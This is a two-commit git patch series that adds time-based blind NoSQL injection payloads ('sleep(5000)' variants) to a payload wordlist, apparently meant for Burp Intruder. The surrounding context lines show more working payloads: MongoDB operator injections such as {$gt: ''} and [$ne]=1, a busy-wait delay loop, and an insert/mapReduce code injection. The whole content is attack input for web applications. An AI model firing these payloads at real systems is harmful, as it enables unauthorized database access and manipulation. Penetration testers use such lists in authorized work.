From be12684bc012b989c07b8102a357d9b1c8c9ab95 Mon Sep 17 00:00:00 2001 From: soffensive Date: Fri, 26 Jan 2018 13:28:57 +0100 Subject: [PATCH 1/2] Added payload to detect more reliably blind NoSQL injection --- NoSQL injection/Intruders/NoSQL.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/NoSQL injection/Intruders/NoSQL.txt b/NoSQL injection/Intruders/NoSQL.txt index 180c8b3..5f12d28 100644 --- a/NoSQL injection/Intruders/NoSQL.txt +++ b/NoSQL injection/Intruders/NoSQL.txt @@ -16,4 +16,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi {$gt: ''} [$ne]=1 ';sleep(5000); +';sleep(5000);' ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); From 4892dc6577384ca94ca96c33804ed0d5dc00eb47 Mon Sep 17 00:00:00 2001 From: soffensive Date: Fri, 26 Jan 2018 13:31:52 +0100 Subject: [PATCH 2/2] Further payload added --- NoSQL injection/Intruders/NoSQL.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/NoSQL injection/Intruders/NoSQL.txt b/NoSQL injection/Intruders/NoSQL.txt index 5f12d28..3ecb23a 100644 --- a/NoSQL injection/Intruders/NoSQL.txt +++ b/NoSQL injection/Intruders/NoSQL.txt @@ -17,4 +17,5 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi [$ne]=1 ';sleep(5000); ';sleep(5000);' +';sleep(5000);+' ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);